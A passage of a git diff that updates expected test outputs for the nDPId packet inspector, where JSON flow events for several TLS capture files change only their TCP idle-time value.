d128
","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust RSA CA 2018","subjectDN":"C=IT, ST=Roma, L=Roma, O=GEDI Digital S.r.l., CN=www.repstatic.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"0C:9F:21:DB:65:A1:BE:EB:D8:89:38:D3:FF:7A:D9:02:8B:F1:60:A1"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":182,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":182,"flow_first_seen":1553619078033,"flow_last_seen":1553619149372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":105569,"flow_avg_l4_payload_len":580,"midstream":0,"thread_ts_msec":1553619149372,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1553619078033,"flow_last_seen":1553619078033,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1553619078033,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1553619078033,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1553619078033,"pkt":"BBjWMe9aeDHBvV4kCABFAABAAABAAEAGN8XAqAJ+aG\/XXesOAbssL+yBAAAAALAC\/\/8wZwAAAgQFtAEDAwYBAQgKJK\/ZdwAAAAAEAgAA"} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1553619078058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1553619078058,"pkt":"eDHBvV4kBBjWMe9aCABFAAA8AABAADYGQclob9ddwKgCfgG76w4xmkZeLC\/sgqAScSAcqQAAAgQFtAQCCArQt2rgJK\/ZdwEDAwc="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1553619078058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1553619078058,"pkt":"BBjWMe9aeDHBvV4kCABFAAA0AABAAEAGN9HAqAJ+aG\/XXesOAbssL+yCMZpGX4AQCAq0dAAAAQEICiSv2Y7Qt2rg"} 
+00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1553619078033,"flow_last_seen":1553619078058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1553619078058,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1553619078033,"flow_last_seen":1553619078091,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1553619078091,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02429{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1553619078033,"flow_last_seen":1553619078093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4613,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":1553619078093,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.repubblica.it","server_names":"www.repstatic.it,repstatic.it,amp-video.lastampa.it,www.repubblica.it,amp-video.deejay.it,amp-video.d.repubblica.it,www.gelestatic.it,oasjs.kataweb.it,video.d.repubblica.it,www.test.capital.it,napoli.repubblica.it,video.ilsecoloxix.it,genova.repubblica.it,cdn.gelestatic.it,video.gelocal.it,media.deejay.it,media.m2o.it,amp-video.espresso.repubblica.it,download.gelocal.it,amp-video.m2o.it,bologna.repubblica.it,torino.repubblica.it,scripts.kataweb.it,palermo.repubblica.it,roma.repubblica.it,video.xl.repubblica.it,amp-video.gelocal.it,video.espresso.repubblica.it,www.capital.it,video.limesonline.com,media.capital.it,syndication-vod-pro.akamai.media.kataweb.it,test.capital.it,video.deejay.it,video.repubblica.it,milano.repubblica.it,video.lanuovasardegna.it,video.m2o.it,parma.repubblica.it,video.3nz.it,syndication-vod-hds.akamai.media.kataweb.it,amp-video.repubblica.it,video.lastampa.it,webfragments.repubblica.it,amp-video.xl.repubblica.it,amp-video.limesonline.com,media.kataweb.it,bari.repubblica.it,syndication-vod-hls.akamai.media.kataweb.it,amp-video.3nz.it,syndication3rd-vod-pro.akamai.media.kataweb.it,firenze.repubblica.it,amp-video.ilsecoloxix.it,amp-video.lanuovasardegna.it,cdn.flv.kataweb.it","ja3":"66918128f1b9b03303d77c6f2eefd128
","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=GeoTrust RSA CA 2018","subjectDN":"C=IT, ST=Roma, L=Roma, O=GEDI Digital S.r.l., CN=www.repstatic.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"0C:9F:21:DB:65:A1:BE:EB:D8:89:38:D3:FF:7A:D9:02:8B:F1:60:A1"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":182,"source":"tls_long_cert.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":182,"flow_first_seen":1553619078033,"flow_last_seen":1553619149372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":105569,"flow_avg_l4_payload_len":580,"midstream":0,"thread_ts_msec":1553619149372,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.111.215.93","src_port":60174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":182,"source":"tls_long_cert.pcap","alias":"nDPId-test","packets-captured":182,"packets-processed":182,"total-skipped-flows":0,"total-l4-data-len":105569,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1553619149372} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 182/182 diff --git a/test/results/tls_port_80.pcapng.out b/test/results/tls_port_80.pcapng.out index 28b508b44..876651e5c 100644 --- a/test/results/tls_port_80.pcapng.out +++ b/test/results/tls_port_80.pcapng.out 
@@ -1,12 +1,12 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_port_80.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_port_80.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1618744619257} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744619257,"flow_last_seen":1618744619257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1618744619257,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1618744619257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744619257,"pkt":"AAAAAAAAAAQAaFgECABFAAA062pAAH8G+tE5W8rChDGNOMVtAFCEMAfKAAAAAIAC+vANRAAAAgQFUAEDAwgBAQQC"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1618744619383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744619383,"pkt":"AAAAAAAAAAMAlyocCABFAAA0AABAADUGMD2EMY04OVvKwgBQxW2J+2kQhDAHy4AS+vAZxAAAAgQFtAEBBAIBAwMH"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1618744620269,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744620269,"pkt":"AAAAAAAAAAQAaFgECABFAAA062tAAH8G+tA5W8rChDGNOMVtAFCEMAfKAAAAAIAC+vANRAAAAgQFUAEDAwgBAQQC"} -01181{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1618744619257,"flow_last_seen":1618744633780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1618744633780,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01240{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1618744619257,"flow_last_seen":1618744633908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1605,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1618744633908,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} 
-00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1618744619257,"flow_last_seen":1618744633908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1605,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1618744633908,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744619257,"flow_last_seen":1618744619257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1618744619257,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1618744619257,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744619257,"pkt":"AAAAAAAAAAQAaFgECABFAAA062pAAH8G+tE5W8rChDGNOMVtAFCEMAfKAAAAAIAC+vANRAAAAgQFUAEDAwgBAQQC"} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1618744619383,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744619383,"pkt":"AAAAAAAAAAMAlyocCABFAAA0AABAADUGMD2EMY04OVvKwgBQxW2J+2kQhDAHy4AS+vAZxAAAAgQFtAEBBAIBAwMH"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1618744620269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1618744620269,"pkt":"AAAAAAAAAAQAaFgECABFAAA062tAAH8G+tA5W8rChDGNOMVtAFCEMAfKAAAAAIAC+vANRAAAAgQFUAEDAwgBAQQC"} +01181{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1618744619257,"flow_last_seen":1618744633780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1618744633780,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01240{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1618744619257,"flow_last_seen":1618744633908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1605,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1618744633908,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"3f2fba0262b1a22b739126dfb2fe7a7d","ja3s":"107030a763c7224285717ff1569a17f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"}} 
+00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1618744619257,"flow_last_seen":1618744633908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1605,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1618744633908,"l3_proto":"ip4","src_ip":"57.91.202.194","dst_ip":"132.49.141.56","src_port":50541,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":13,"source":"tls_port_80.pcapng","alias":"nDPId-test","packets-captured":13,"packets-processed":13,"total-skipped-flows":0,"total-l4-data-len":1605,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1618744633908} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 13/13 diff --git a/test/results/tls_torrent.pcapng.out b/test/results/tls_torrent.pcapng.out index c28c1e954..a4e4ad973 100644 --- a/test/results/tls_torrent.pcapng.out +++ b/test/results/tls_torrent.pcapng.out 
@@ -1,13 +1,13 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_torrent.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_torrent.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1639054407415} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054407415,"flow_last_seen":1639054407415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639054407415,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639054407415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1639054407415,"pkt":"AAAAAAAAAAcAAh9nCABFAAA0ug0AAOIGSgIKCgoBwKgAAQG75dqEHE30Ee7ob4ASBaDg4gAAAgQFeAEBBAIBAwMJ"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639054407427,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1639054407427,"pkt":"AAAAAAAAAAcAAh9nCABFAAA0ug8AAOIGSgAKCgoBwKgAAQG75dqEHE30Ee7ob4ASBaDg4gAAAgQFeAEBBAIBAwMJ"} -00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639054407443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1639054407443,"pkt":"AAAAAAAAAAgAP8PgCABFAAF07ppAAH8GNzXAqAABCgoKAeXaAbsR7uhvhBxN9VAYAQFi5gAAFgMBAUcBAAFDAwMaHZWwfkF0Un0n60H4DuzdTswHjey14FNv5IuITjtzKgAArMAwwCzAKMAkwBTACgClAKMAoQCfAGsAagBpAGgAOQA4ADcANgCIAIcAhgCFwDLALsAqwCbAD8AFAJ0APQA1AITAL8ArwCfAI8ATwAkApACiAKAAngBnAEAAPwA+ADMAMgAxADAAmgCZAJgAlwBFAEQAQwBCwDHALcApwCXADsAEAJwAPAAvAJYAQQAHwBHAB8AMwAIABQAEwBLACAAWABMAEAANwA3AAwAKAP8BAABuAAAAFQATAAAQd2ViLnV0b3JyZW50LmNvbQALAAQDAAECAAoAHAAaABcAGQAcABsAGAAaABYADgANAAsADAAJAAoAIwAAAA0AIAAeBgEGAgYDBQEFAgUDBAEEAgQDAwEDAgMDAgECAgIDAA8AAQE="} 
-00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1639054407415,"flow_last_seen":1639054407443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":332,"flow_tot_l4_payload_len":332,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1639054407443,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"tls_torrent.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639054407415,"flow_last_seen":1639054407574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1732,"flow_avg_l4_payload_len":433,"midstream":0,"thread_ts_msec":1639054407574,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":443,"dst_port":58842,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.utorrent.com","ja3":"fd80fa9c6120cdeea8520510f3c644ac","ja3s":"6f84bbe9810ec4ea9061cc1a02eaf83c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
